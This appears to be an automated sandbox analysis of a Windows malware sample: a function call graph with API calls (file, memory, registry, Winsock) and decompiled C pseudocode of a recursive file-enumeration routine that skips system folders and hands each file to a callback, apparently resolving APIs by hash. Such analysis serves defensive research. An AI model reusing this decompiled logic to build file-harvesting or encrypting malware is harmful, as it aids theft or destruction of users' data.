8324->8327 8326->8307 8328 405714 8327->8328 8329 402b7c 2 API calls 8328->8329 8331 405730 8329->8331 8330 405752 8330->8326 8331->8330 8332 402bab 2 API calls 8331->8332 8332->8330 8334 4031e5 3 API calls 8333->8334 8335 4040d5 CreateFileW 8334->8335 8336 4040f8 8335->8336 8337 40418d 8335->8337 8338 4031e5 3 API calls 8336->8338 8349 404183 8337->8349 8377 403c90 8337->8377 8339 404105 8338->8339 8347 4031e5 3 API calls 8339->8347 8356 40416d 8339->8356 8345 4040bb 9 API calls 8348 4041c8 8345->8348 8346 402bab 2 API calls 8346->8349 8350 404131 VirtualAlloc 8347->8350 8348->8346 8349->8312 8349->8313 8349->8322 8351 404142 8350->8351 8350->8356 8352 4031e5 3 API calls 8351->8352 8353 40414f ReadFile 8352->8353 8354 404160 8353->8354 8353->8356 8355 4031e5 3 API calls 8354->8355 8355->8356 8374 403c40 8356->8374 8358 4031e5 3 API calls 8357->8358 8359 403fb1 VirtualFree 8358->8359 8359->8322 8361 4031e5 3 API calls 8360->8361 8362 40563a 8361->8362 8363 405872 8362->8363 8364 405881 8363->8364 8370 4058bc 8364->8370 8424 4058d4 8364->8424 8366 405797 4 API calls 8367 4058af 8366->8367 8367->8314 8369 405781 4 API calls 8369->8370 8370->8366 8370->8367 8372 405781 4 API calls 8371->8372 8373 405770 8372->8373 8373->8320 8375 4031e5 3 API calls 8374->8375 8376 403c52 CloseHandle 8375->8376 8376->8349 8378 403ca3 8377->8378 8379 403caa 8377->8379 8404 405dc5 8378->8404 8380 404056 6 API calls 8379->8380 8390 403d3a 8379->8390 8382 403cbe 8380->8382 8383 403d17 8382->8383 8384 403ccf 8382->8384 8394 403d2e 8382->8394 8385 405b6f 5 API calls 8383->8385 8386 405b6f 5 API calls 8384->8386 8388 403d14 8385->8388 8389 403cdd 8386->8389 8387 402bab 2 API calls 8387->8390 8392 402bab 2 API calls 8388->8392 8391 405b6f 5 API calls 8389->8391 8390->8349 8400 403c59 8390->8400 8393 403cee 8391->8393 8392->8394 8393->8388 8409 403d4d 8393->8409 8394->8387 8394->8390 8397 403d0b 8399 402bab 2 API calls 8397->8399 8399->8388 8401 403c21 8400->8401 8402 4031e5 3 API calls 8401->8402 8403 403c33 8402->8403 8403->8345 8403->8348 8418 406799 8404->8418 8406 405dd5 8407 402b7c 2 API calls 8406->8407 8408 405dfe 8407->8408 8408->8379 8421 403bb7 8409->8421 8411 403cfe 8411->8397 8412 403c62 8411->8412 8413 403d4d 4 API calls 8412->8413 8414 403c6d 8413->8414 8415 403c72 8414->8415 8416 4031e5 3 API calls 8414->8416 8415->8397 8417 403c87 CreateDirectoryW 8416->8417 8417->8397 8419 4031e5 3 API calls 8418->8419 8420 4067ad 8419->8420 8420->8406 8422 4031e5 3 API calls 8421->8422 8423 403bc9 GetFileAttributesW 8422->8423 8423->8411 8425 405797 4 API calls 8424->8425 8426 4058a8 8425->8426 8426->8367 8426->8369 8428 4031e5 3 API calls 8427->8428 8429 403baa 8428->8429 8429->8258 8429->8259 9780 40ebc6 9781 4040bb 12 API calls 9780->9781 9782 40ebdf 9781->9782 9787 40ecd7 9782->9787 9800 407795 9782->9800 9785 4056bf 2 API calls 9798 40ec12 9785->9798 9786 403f9e 4 API calls 9786->9787 9788 40ecb5 9789 402bab 2 API calls 9788->9789 9790 40ecbd 9789->9790 9791 413aca 4 API calls 9790->9791 9792 40ecc7 9791->9792 9794 405695 2 API calls 9792->9794 9793 407908 GetProcessHeap RtlAllocateHeap 9793->9798 9795 40eccd 9794->9795 9795->9786 9796 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9796->9798 9798->9788 9798->9793 9798->9796 9799 402bab GetProcessHeap HeapFree 9798->9799 9811 412269 9798->9811 9799->9798 9801 4077ab 9800->9801 9807 4077b3 9801->9807 9818 405ae9 9801->9818 9803 4077e1 9804 407802 9803->9804 9805 4077f8 9803->9805 9803->9807 9808 402b7c 2 API calls 9804->9808 9806 402bab 2 API calls 9805->9806 9806->9807 9807->9785 9807->9795 9809 407811 9808->9809 9810 402bab 2 API calls 9809->9810 9810->9807 9834 40374e 9811->9834 9814 412299 9814->9798 9817 402bab 2 API calls 9817->9814 9819 405af7 9818->9819 9820 402b7c 2 API calls 9819->9820 9822 405b03 9820->9822 9821 405b5a 9821->9803 9822->9821 9831 405998 9822->9831 9824 405b21 9825 405b61 9824->9825 9827 402b7c 2 API calls 9824->9827 9826 402bab 2 API calls 9825->9826 9826->9821 9828 405b39 9827->9828 9828->9825 9829 405b40 9828->9829 9830 402bab 2 API calls 9829->9830 9830->9821 9832 4031e5 3 API calls 9831->9832 9833 4059ab 9832->9833 9833->9824 9835 402b7c 2 API calls 9834->9835 9837 40375f 9835->9837 9836 4037a3 9836->9814 9841 4037be 9836->9841 9837->9836 9838 4031e5 3 API calls 9837->9838 9839 40378f 9838->9839 9839->9836 9840 402bab 2 API calls 9839->9840 9840->9836 9842 4031e5 3 API calls 9841->9842 9843 4037e2 9842->9843 9844 40382b 9843->9844 9845 402b7c 2 API calls 9843->9845 9844->9817 9846 403802 9845->9846 9847 403832 9846->9847 9849 403809 9846->9849 9848 4036a3 3 API calls 9847->9848 9848->9844 9850 4036a3 3 API calls 9849->9850 9850->9844 9027 410cd1 9032 412093 9027->9032 9030 412093 12 API calls 9031 410cff 9030->9031 9037 4120a5 9032->9037 9051 410cf1 9032->9051 9033 404056 6 API calls 9034 4120ba 9033->9034 9036 412152 9034->9036 9039 405b6f 5 API calls 9034->9039 9034->9051 9035 4120b3 9035->9033 9054 403d74 9036->9054 9037->9035 9038 412100 9037->9038 9040 403fbf 6 API calls 9038->9040 9038->9051 9043 412125 9039->9043 9040->9034 9043->9036 9045 412139 9043->9045 9046 41214d 9043->9046 9044 41218c 9048 402bab 2 API calls 9044->9048 9044->9051 9050 402bab 2 API calls 9045->9050 9049 402bab 2 API calls 9046->9049 9047 402bab 2 API calls 9047->9044 9048->9051 9049->9036 9052 41213e 9050->9052 9051->9030 9053 402bab 2 API calls 9052->9053 9053->9051 9055 403d87 9054->9055 9056 405b6f 5 API calls 9055->9056 9067 403ea3 9055->9067 9058 403da3 9056->9058 9057 405b6f 5 API calls 9059 403eb9 9057->9059 9061 4031e5 3 API calls 9058->9061 9058->9067 9060 4031e5 3 API calls 9059->9060 9088 403f6f 9059->9088 9062 403ed3 FindFirstFileW 9060->9062 9063 403dbc FindFirstFileW 9061->9063 9079 403ee8 9062->9079 9080 403f8d 9062->9080 9074 403e9c 9063->9074 9083 403dd1 9063->9083 9064 402bab 2 API calls 9064->9088 9065 402bab 2 API calls 9065->9067 9066 4031e5 3 API calls 9068 403e84 FindNextFileW 9066->9068 9067->9057 9069 403e96 9068->9069 9068->9083 9093 403bef 9069->9093 9070 4031e5 3 API calls 9073 403f50 FindNextFileW 9070->9073 9072 405b6f 5 API calls 9072->9079 9076 403f87 9073->9076 9073->9079 9074->9065 9075 405b6f 5 API calls 9075->9083 9077 403bef 4 API calls 9076->9077 9077->9080 9078 403f75 9081 402bab 2 API calls 9078->9081 9079->9070 9079->9072 9079->9078 9085 402bab 2 API calls 9079->9085 9080->9064 9084 403f7b 9081->9084 9082 403d74 6 API calls 9082->9083 9083->9066 9083->9075 9083->9082 9086 402bab 2 API calls 9083->9086 9089 403f63 9083->9089 9087 403bef 4 API calls 9084->9087 9085->9079 9086->9083 9087->9088 9088->9044 9088->9047 9090 402bab 2 API calls 9089->9090 9091 403f69 9090->9091 9092 403bef 4 API calls 9091->9092 9092->9088 9094 4031e5 3 API calls 9093->9094 9095 403c01 FindClose 9094->9095 9095->9074 9282 4049dc 9283 4031e5 3 API calls 9282->9283 9284 4049ef SHEnumKeyExW 9283->9284 9933 40cddd 9934 405b6f 5 API calls 9933->9934 9935 40cdee 9934->9935 9936 40ce06 9935->9936 9937 413a58 13 API calls 9935->9937 9939 405b6f 5 API calls 9936->9939 9944 40ce59 9936->9944 9938 40ce00 9937->9938 9940 402bab 2 API calls 9938->9940 9941 40ce1c 9939->9941 9940->9936 9942 403d74 10 API calls 9941->9942 9941->9944 9947 40ce52 9941->9947 9945 40ce45 9942->9945 9943 402bab 2 API calls 9943->9944 9946 402bab 2 API calls 9945->9946 9945->9947 9946->9947 9947->9943 9285 40ecde 9286 412093 12 API calls 9285->9286 9287 40ecfd 9286->9287 9288 412093 12 API calls 9287->9288 9289 40ed0d 9288->9289 9293 40e8df 9294 412093 12 API calls 9293->9294 9295 40e8f8 9294->9295 9296 412093 12 API calls 9295->9296 9297 40e908 9296->9297 9304 404b22 9297->9304 9299 40e93d 9300 40e91c 9300->9299 9301 40e936 9300->9301 9311 40e944 9300->9311 9303 402bab 2 API calls 9301->9303 9303->9299 9305 402b7c 2 API calls 9304->9305 9307 404b33 9305->9307 9306 404b66 9306->9300 9307->9306 9320 4049b3 9307->9320 9309 404b5f 9309->9306 9310 402bab 2 API calls 9309->9310 9310->9306 9312 4056bf 2 API calls 9311->9312 9313 40e952 9312->9313 9314 4057df 13 API calls 9313->9314 9319 40e976 9313->9319 9315 40e966 9314->9315 9316 413aca 4 API calls 9315->9316 9317 40e970 9316->9317 9318 405695 2 API calls 9317->9318 9318->9319 9319->9301 9321 4031e5 3 API calls 9320->9321 9322 4049c6 SHGetValueW 9321->9322 9322->9309 9323 4139de 9332 413855 9323->9332 9325 4139f1 9326 413838 GetProcessHeap RtlAllocateHeap GetPEB 9325->9326 9327 4139f7 9326->9327 9328 413866 64 API calls 9327->9328 9329 413a2d 9328->9329 9330 413b81 GetProcessHeap RtlAllocateHeap GetPEB 9329->9330 9331 413a34 9330->9331 9333 4031e5 3 API calls 9332->9333 9334 413864 9333->9334 9334->9334 9953 4116e7 9954 4117ba 9953->9954 9955 4117f1 9954->9955 9956 405b6f 5 API calls 9954->9956 9957 4117d0 9956->9957 9957->9955 9958 404cbf 7 API calls 9957->9958 9959 4117eb 9958->9959 9960 402bab 2 API calls 9959->9960 9960->9955 9354 4094e7 9355 404b22 6 API calls 9354->9355 9356 4094fe 9355->9356 9357 409554 9356->9357 9358 405b6f 5 API calls 9356->9358 9359 409514 9358->9359 9360 40954d 9359->9360 9361 404b22 6 API calls 9359->9361 9362 402bab 2 API calls 9360->9362 9363 40952d 9361->9363 9362->9357 9364 409544 9363->9364 9365 409408 17 API calls 9363->9365 9366 402bab 2 API calls 9364->9366 9367 40953e 9365->9367 9366->9360 9368 402bab 2 API calls 9367->9368 9368->9364 10005 40d4ea 10006 404bee 5 API calls 10005->10006 10007 40d500 10006->10007 10008 40d5a0 10007->10008 10009 404bee 5 API calls 10007->10009 10010 40d529 10009->10010 10011 404bee 5 API calls 10010->10011 10012 40d537 10011->10012 10013 404bee 5 API calls 10012->10013 10014 40d546 10013->10014 10014->10008 10015 405872 4 API calls 10014->10015 10016 40d56d 10015->10016 10017 405872 4 API calls 10016->10017 10018 40d57c 10017->10018 10019 405872 4 API calls 10018->10019 10020 40d58e 10019->10020 10021 405872 4 API calls 10020->10021 10021->10008 10022 4058ea 10023 4031e5 3 API calls 10022->10023 10024 4058fd 10023->10024 10025 40a3ea 10026 40374e 5 API calls 10025->10026 10027 40a403 10026->10027 10028 40a419 10027->10028 10029 4059d8 3 API calls 10027->10029 10030 40a411 10029->10030 10031 402bab 2 API calls 10030->10031 10031->10028 9414 404df3 WSAStartup 9418 4091f6 9419 404b22 6 API calls 9418->9419 9420 40920b 9419->9420 9421 409222 9420->9421 9422 409408 17 API calls 9420->9422 9423 40921c 9422->9423 9424 402bab 2 API calls 9423->9424 9424->9421 10058 4117fe 10059 404c4e 5 API calls 10058->10059 10060 411888 10059->10060 10061 404c4e 5 API calls 10060->10061 10067 411925 10060->10067 10062 4118ab 10061->10062 10062->10067 10077 4119b3 10062->10077 10064 4118c5 10065 4119b3 3 API calls 10064->10065 10066 4118d0 10065->10066 10066->10067 10068 4056bf 2 API calls 10066->10068 10069 4118fd 10068->10069 10070 405872 4 API calls 10069->10070 10071 41190a 10070->10071 10072 405872 4 API calls 10071->10072 10073 411915 10072->10073 10074 413aca 4 API calls 10073->10074 10075 41191f 10074->10075 10076 405695 2 API calls 10075->10076 10076->10067 10078 4119c6 10077->10078 10080 4119bf 10077->10080 10079 4031e5 3 API calls 10078->10079 10079->10080 10080->10064 9428 40e880 9429 41219c 14 API calls 9428->9429 9430 40e88e 9429->9430 9431 41219c 14 API calls 9430->9431 9432 40e89c 9431->9432 10144 40e48a 10145 404bee 5 API calls 10144->10145 10146 40e4d0 10145->10146 10147 40e4f4 10146->10147 10148 405872 4 API calls 10146->10148 10148->10147 9529 410390 9530 404b22 6 API calls 9529->9530 9531 4103a5 9530->9531 9532 410409 9531->9532 9533 405b6f 5 API calls 9531->9533 9538 4103ba 9533->9538 9534 410402 9535 402bab 2 API calls 9534->9535 9535->9532 9536 4103fb 9537 402bab 2 API calls 9536->9537 9537->9534 9538->9534 9538->9536 9539 403d74 10 API calls 9538->9539 9540 4103ee 9539->9540 9540->9536 9541 402bab 2 API calls 9540->9541 9541->9536 10159 40ed96 10160 4040bb 12 API calls 10159->10160 10169 40edb0 10160->10169 10161 40ef90 10162 403f9e 4 API calls 10162->10161 10163 405ae9 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree GetPEB 10163->10169 10164 412269 5 API calls 10164->10169 10165 40ef61 10166 40ef6e 10165->10166 10168 402bab 2 API calls 10165->10168 10170 40ef7c 10166->10170 10171 402bab 2 API calls 10166->10171 10167 402bab GetProcessHeap HeapFree 10167->10169 10168->10166 10169->10161 10169->10163 10169->10164 10169->10165 10169->10167 10173 40ef87 10169->10173 10174 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10169->10174 10172 402bab 2 API calls 10170->10172 10170->10173 10171->10170 10172->10173 10173->10162 10174->10169 10175 40ef98 10176 404c4e 5 API calls 10175->10176 10177 40efb6 10176->10177 10189 40f02a 10177->10189 10190 40f054 10177->10190 10180 404bee 5 API calls 10181 40efda 10180->10181 10182 404bee 5 API calls 10181->10182 10183 40efe9 10182->10183 10184 405872 4 API calls 10183->10184 10183->10189 10185 40f008 10184->10185 10186 405872 4 API calls 10185->10186 10187 40f01a 10186->10187 10188 405872 4 API calls 10187->10188 10188->10189 10191 40f064 10190->10191 10192 402b7c 2 API calls 10191->10192 10194 40f072 10192->10194 10193 40efca 10193->10180 10194->10193 10196 405ecd 10194->10196 10197 4059b8 3 API calls 10196->10197 10198 405edf 10197->10198 10198->10194 9548 410c98 9549 41219c 14 API calls 9548->9549 9550 410ca8 9549->9550 9551 41219c 14 API calls 9550->9551 9552 410cb5 9551->9552 9553 412093 12 API calls 9552->9553 9554 410cc9 9553->9554 10268 41249c 10269 4056bf 2 API calls 10268->10269 10270 4124aa 10269->10270 10271 4124ce 10270->10271 10272 4057df 13 API calls 10270->10272 10273 4124be 10272->10273 10274 413aca 4 API calls 10273->10274 10275 4124c8 10274->10275 10276 405695 2 API calls 10275->10276 10276->10271 9558 40f49e 9559 40f4b6 13 API calls 9558->9559 9560 40f4a8 9559->9560 9561 40929e 9562 413b28 6 API calls 9561->9562 9563 4092a4 9562->9563 9564 405b6f 5 API calls 9563->9564 9565 4092af 9564->9565 9566 409408 17 API calls 9565->9566 9569 4092c5 9565->9569 9567 4092bf 9566->9567 9568 402bab 2 API calls 9567->9568 9568->9569 10377 407fa4 10378 407fb7 10377->10378 10379 402b7c 2 API calls 10378->10379 10380 407fee 10378->10380 10381 40800d 10379->10381 10381->10380 10382 4037be 3 API calls 10381->10382 10383 40803c 10382->10383 10384 402bab 2 API calls 10383->10384 10384->10380 9603 4090aa 9604 404b22 6 API calls 9603->9604 9605 4090c1 9604->9605 9606 409408 17 API calls 9605->9606 9613 4090d8 9605->9613 9608 4090d2 9606->9608 9607 404b22 6 API calls 9610 4090eb 9607->9610 9609 402bab 2 API calls 9608->9609 9609->9613 9611 409104 9610->9611 9612 408c4d 16 API calls 9610->9612 9614 4090fe 9612->9614 9613->9607 9615 402bab 2 API calls 9614->9615 9615->9611 9622 409cae 9637 404b79 9622->9637 9624 409d2f 9625 409cc5 9625->9624 9627 405b6f 5 API calls 9625->9627 9634 409d27 9625->9634 9626 402bab 2 API calls 9626->9624 9628 409cec 9627->9628 9629 404b79 6 API calls 9628->9629 9628->9634 9630 409d05 9629->9630 9631 408c4d 16 API calls 9630->9631 9636 409d1e 9630->9636 9633 409d18 9631->9633 9632 402bab 2 API calls 9632->9634 9635 402bab 2 API calls 9633->9635 9634->9626 9635->9636 9636->9632 9638 404b22 6 API calls 9637->9638 9639 404b8a 9638->9639 9639->9625 10444 411fb3 10445 405b6f 5 API calls 10444->10445 10447 412013 10445->10447 10446 412075 10447->10446 10462 41206a 10447->10462 10463 411a8d 10447->10463 10449 402bab 2 API calls 10449->10446 10451 4056bf 2 API calls 10452 41203d 10451->10452 10453 405872 4 API calls 10452->10453 10454 41204a 10453->10454 10455 413aca 4 API calls 10454->10455 10456 412054 10455->10456 10457 405695 2 API calls 10456->10457 10458 41205a 10457->10458 10459 413a58 13 API calls 10458->10459 10460 412064 10459->10460 10461 402bab 2 API calls 10460->10461 10461->10462 10462->10449 10464 402b7c 2 API calls 10463->10464 10465 411aa3 10464->10465 10482 411f05 10465->10482 10486 404ada 10465->10486 10468 404ada 3 API calls 10469 411cad 10468->10469 10470 411f0c 10469->10470 10471 411cc0 10469->10471 10472 402bab 2 API calls 10470->10472 10489 405eb6 10471->10489 10472->10482 10474 411d3c 10475 4031e5 3 API calls 10474->10475 10484 411d7b 10475->10484 10476 411ea6 10477 4031e5 3 API calls 10476->10477 10478 411eb5 10477->10478 10479 4031e5 3 API calls 10478->10479 10480 411ed6 10479->10480 10481 405eb6 3 API calls 10480->10481 10481->10482 10482->10451 10482->10462 10483 4031e5 GetProcessHeap RtlAllocateHeap GetPEB 10483->10484 10484->10476 10484->10483 10485 405eb6 3 API calls 10484->10485 10485->10484 10487 4031e5 3 API calls 10486->10487 10488 404afd 10487->10488 10488->10468 10490 405998 3 API calls 10489->10490 10491 405ec8 10490->10491 10491->10474 9669 40f6b8 9670 41219c 14 API calls 9669->9670 9671 40f6c7 9670->9671 9672 41219c 14 API calls 9671->9672 9673 40f6d5 9672->9673 9674 41219c 14 API calls 9673->9674 9675 40f6df 9674->9675 9694 40d6bd 9695 4056bf 2 API calls 9694->9695 9696 40d6c9 9695->9696 9707 404cbf 9696->9707 9699 404cbf 7 API calls 9700 40d6f4 9699->9700 9701 404cbf 7 API calls 9700->9701 9702 40d702 9701->9702 9703 413aca 4 API calls 9702->9703 9704 40d711 9703->9704 9705 405695 2 API calls 9704->9705 9706 40d71f 9705->9706 9708 402b7c 2 API calls 9707->9708 9709 404ccd 9708->9709 9710 404ddc 9709->9710 9711 404b8f 4 API calls 9709->9711 9710->9699 9712 404ce4 9711->9712 9714 402b7c 2 API calls 9712->9714 9716 404dd4 9712->9716 9713 402bab 2 API calls 9713->9710 9725 404d04 9714->9725 9715 404a39 4 API calls 9715->9716 9716->9713 9717 404dc6 9718 402bab 2 API calls 9717->9718 9720 404dcc 9718->9720 9719 402b7c 2 API calls 9719->9725 9720->9715 9721 404b8f 4 API calls 9721->9725 9722 404a39 4 API calls 9722->9725 9723 405b6f 5 API calls 9723->9725 9724 404cbf 7 API calls 9724->9725 9725->9717 9725->9719 9725->9720 9725->9721 9725->9722 9725->9723 9725->9724 9726 402bab GetProcessHeap HeapFree 9725->9726 9726->9725 9727 40f0bf 9728 4056bf 2 API calls 9727->9728 9729 40f0c9 9728->9729 9731 404cbf 7 API calls 9729->9731 9739 40f115 9729->9739 9730 41219c 14 API calls 9732 40f128 9730->9732 9733 40f0ed 9731->9733 9734 404cbf 7 API calls 9733->9734 9735 40f0fb 9734->9735 9736 413aca 4 API calls 9735->9736 9737 40f10a 9736->9737 9738 405695 2 API calls 9737->9738 9738->9739 9739->9730

                                                                                          Executed Functions

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 254 403d74-403d90 call 4067c4 257 403d96-403da9 call 405b6f 254->257 258 403ea9-403ec0 call 405b6f 254->258 265 403ea6-403ea8 257->265 266 403daf-403dcb call 4031e5 FindFirstFileW 257->266 263 403f95 258->263 264 403ec6-403ee2 call 4031e5 FindFirstFileW 258->264 268 403f97-403f9d 263->268 272 403ee8-403ef8 call 405d24 264->272 273 403f8e-403f94 call 402bab 264->273 265->258 274 403dd1-403dd8 266->274 275 403e9d-403ea4 call 402bab 266->275 289 403f03-403f0a 272->289 290 403efa-403f01 272->290 273->263 276 403e75-403e90 call 4031e5 FindNextFileW 274->276 277 403dde-403de2 274->277 275->265 276->274 293 403e96-403e97 call 403bef 276->293 281 403e12-403e22 call 405d24 277->281 282 403de4-403df9 call 405eff 277->282 302 403e30-403e4c call 405b6f 281->302 303 403e24-403e2e 281->303 282->276 299 403dfb-403e10 call 405eff 282->299 295 403f12-403f2d call 405b6f 289->295 296 403f0c-403f10 289->296 290->289 294 403f41-403f5c call 4031e5 FindNextFileW 290->294 306 403e9c 293->306 309 403f87-403f88 call 403bef 294->309 310 403f5e-403f61 294->310 295->294 312 403f2f-403f33 295->312 296->294 296->295 299->276 299->281 302->276 317 403e4e-403e6f call 403d74 call 402bab 302->317 303->276 303->302 306->275 318 403f8d 309->318 310->272 315 403f75-403f85 call 402bab call 403bef 312->315 316 403f35-403f40 call 402bab 312->316 315->268 316->294 317->276 330 403f63-403f73 call 402bab call 403bef 317->330 318->273 330->268
                                                                                          C-Code - Quality: 85%
                                                                                          			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                          				struct _WIN32_FIND_DATAW _v596;
                                                                                          				void* __ebx;
                                                                                          				void* _t35;
                                                                                          				int _t43;
                                                                                          				void* _t52;
                                                                                          				int _t56;
                                                                                          				intOrPtr _t60;
                                                                                          				void* _t66;
                                                                                          				void* _t73;
                                                                                          				void* _t74;
                                                                                          				WCHAR* _t98;
                                                                                          				void* _t99;
                                                                                          				void* _t100;
                                                                                          				void* _t101;
                                                                                          				WCHAR* _t102;
                                                                                          				void* _t103;
                                                                                          				void* _t104;
                                                                                          
                                                                                          				L004067C4(0xa); // executed
                                                                                          				_t72 = 0;
                                                                                          				_t100 = 0x2e;
                                                                                          				_t106 = _a16;
                                                                                          				if(_a16 == 0) {
                                                                                          					L15:
                                                                                          					_push(_a8);
                                                                                          					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                                                                                          					_t104 = _t103 + 0xc;
                                                                                          					if(_t98 == 0) {
                                                                                          						L30:
                                                                                          						__eflags = 0;
                                                                                          						return 0;
                                                                                          					}
                                                                                          					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                                                                                          					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                                                                                          					_t73 = _t35;
                                                                                          					if(_t73 == 0xffffffff) {
                                                                                          						L29:
                                                                                          						E00402BAB(_t98);
                                                                                          						goto L30;
                                                                                          					}
                                                                                          					L17:
                                                                                          					while(1) {
                                                                                          						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                                                                                          							if(_v596.dwFileAttributes != 0x10) {
                                                                                          								L21:
                                                                                          								_push( &(_v596.cFileName));
                                                                                          								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                                                                                          								_t104 = _t104 + 0xc;
                                                                                          								if(_t101 == 0) {
                                                                                          									goto L24;
                                                                                          								}
                                                                                          								if(_a12 == 0) {
                                                                                          									E00402BAB(_t98);
                                                                                          									E00403BEF(_t73);
                                                                                          									return _t101;
                                                                                          								}
                                                                                          								_a12(_t101);
                                                                                          								E00402BAB(_t101);
                                                                                          								goto L24;
                                                                                          							}
                                                                                          							_t124 = _a20;
                                                                                          							if(_a20 == 0) {
                                                                                          								goto L24;
                                                                                          							}
                                                                                          							goto L21;
                                                                                          						} else {
                                                                                          							L24:
                                                                                          							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                                                                                          							_t43 = FindNextFileW(_t73,  &_v596); // executed
                                                                                          							if(_t43 == 0) {
                                                                                          								E00403BEF(_t73); // executed
                                                                                          								goto L29;
                                                                                          							}
                                                                                          							_t100 = 0x2e;
                                                                                          							continue;
                                                                                          						}
                                                                                          					}
                                                                                          				}
                                                                                          				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                                                                                          				if(_t102 == 0) {
                                                                                          					L14:
                                                                                          					_t100 = 0x2e;
                                                                                          					goto L15;
                                                                                          				}
                                                                                          				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                                                                                          				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                                                                                          				_t74 = _t52;
                                                                                          				if(_t74 == 0xffffffff) {
                                                                                          					L13:
                                                                                          					E00402BAB(_t102);
                                                                                          					_t72 = 0;
                                                                                          					goto L14;
                                                                                          				} else {
                                                                                          					goto L3;
                                                                                          				}
                                                                                          				do {
                                                                                          					L3:
                                                                                          					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                                                                                          						goto L11;
                                                                                          					}
                                                                                          					if(_a24 == 0) {
                                                                                          						L7:
                                                                                          						if(E00405D24( &(_v596.cFileName)) >= 3) {
                                                                                          							L9:
                                                                                          							_push( &(_v596.cFileName));
                                                                                          							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                                                                                          							_t103 = _t103 + 0xc;
                                                                                          							_a16 = _t60;
                                                                                          							_t115 = _t60;
                                                                                          							if(_t60 == 0) {
                                                                                          								goto L11;
                                                                                          							}
                                                                                          							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                                                                                          							E00402BAB(_a16);
                                                                                          							_t103 = _t103 + 0x1c;
                                                                                          							if(_t99 != 0) {
                                                                                          								E00402BAB(_t102);
                                                                                          								E00403BEF(_t74);
                                                                                          								return _t99;
                                                                                          							}
                                                                                          							goto L11;
                                                                                          						}
                                                                                          						_t66 = 0x2e;
                                                                                          						_t114 = _v596.cFileName - _t66;
                                                                                          						if(_v596.cFileName == _t66) {
                                                                                          							goto L11;
                                                                                          						}
                                                                                          						goto L9;
                                                                                          					}
                                                                                          					_push(L"Windows");
                                                                                          					if(E00405EFF( &(_v596.cFileName)) != 0) {
                                                                                          						goto L11;
                                                                                          					}
                                                                                          					_push(L"Program Files");
                                                                                          					if(E00405EFF( &(_v596.cFileName)) != 0) {
                                                                                          						goto L11;
                                                                                          					}
                                                                                          					goto L7;
                                                                                          					L11:
                                                                                          					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                                                                                          					_t56 = FindNextFileW(_t74,  &_v596); // executed
                                                                                          				} while (_t56 != 0);
                                                                                          				E00403BEF(_t74); // executed
                                                                                          				goto L13;
                                                                                          			}




















                                                                                          0x00403d82
                                                                                          0x00403d88
                                                                                          0x00403d8c
                                                                                          0x00403d8d
                                                                                          0x00403d90
                                                                                          0x00403ea9
                                                                                          0x00403ea9
                                                                                          0x00403eb9
                                                                                          0x00403ebb
                                                                                          0x00403ec0
                                                                                          0x00403f95
                                                                                          0x00403f95
                                                                                          0x00000000
                                                                                          0x00403f95
                                                                                          0x00403ece
                                                                                          0x00403edb
                                                                                          0x00403edd
                                                                                          0x00403ee2
                                                                                          0x00403f8e
                                                                                          0x00403f8f
                                                                                          0x00000000
                                                                                          0x00403f94
                                                                                          0x00000000
                                                                                          0x00403ee8
                                                                                          0x00403ef8
                                                                                          0x00403f0a
                                                                                          0x00403f12
                                                                                          0x00403f18
                                                                                          0x00403f26
                                                                                          0x00403f28
                                                                                          0x00403f2d
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00403f33
                                                                                          0x00403f76
                                                                                          0x00403f7c
                                                                                          0x00000000
                                                                                          0x00403f83
                                                                                          0x00403f36
                                                                                          0x00403f3a
                                                                                          0x00000000
                                                                                          0x00403f40
                                                                                          0x00403f0c
                                                                                          0x00403f10
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00403f41
                                                                                          0x00403f41
                                                                                          0x00403f4b
                                                                                          0x00403f58
                                                                                          0x00403f5c
                                                                                          0x00403f88
                                                                                          0x00000000
                                                                                          0x00403f8d
                                                                                          0x00403f60
                                                                                          0x00000000
                                                                                          0x00403f60
                                                                                          0x00403ef8
                                                                                          0x00403ee8
                                                                                          0x00403da3
                                                                                          0x00403da9
                                                                                          0x00403ea6
                                                                                          0x00403ea8
                                                                                          0x00000000
                                                                                          0x00403ea8
                                                                                          0x00403db7
                                                                                          0x00403dc4
                                                                                          0x00403dc6
                                                                                          0x00403dcb
                                                                                          0x00403e9d
                                                                                          0x00403e9e
                                                                                          0x00403ea4
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00403dd1
                                                                                          0x00403dd1
                                                                                          0x00403dd8
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00403de2
                                                                                          0x00403e12
                                                                                          0x00403e22
                                                                                          0x00403e30
                                                                                          0x00403e36
                                                                                          0x00403e3f
                                                                                          0x00403e44
                                                                                          0x00403e47
                                                                                          0x00403e4a
                                                                                          0x00403e4c
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00403e63
                                                                                          0x00403e65
                                                                                          0x00403e6a
                                                                                          0x00403e6f
                                                                                          0x00403f64
                                                                                          0x00403f6a
                                                                                          0x00000000
                                                                                          0x00403f71
                                                                                          0x00000000
                                                                                          0x00403e6f
                                                                                          0x00403e26
                                                                                          0x00403e27
                                                                                          0x00403e2e
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00403e2e
                                                                                          0x00403dea
                                                                                          0x00403df9
                                                                                          0x00000000
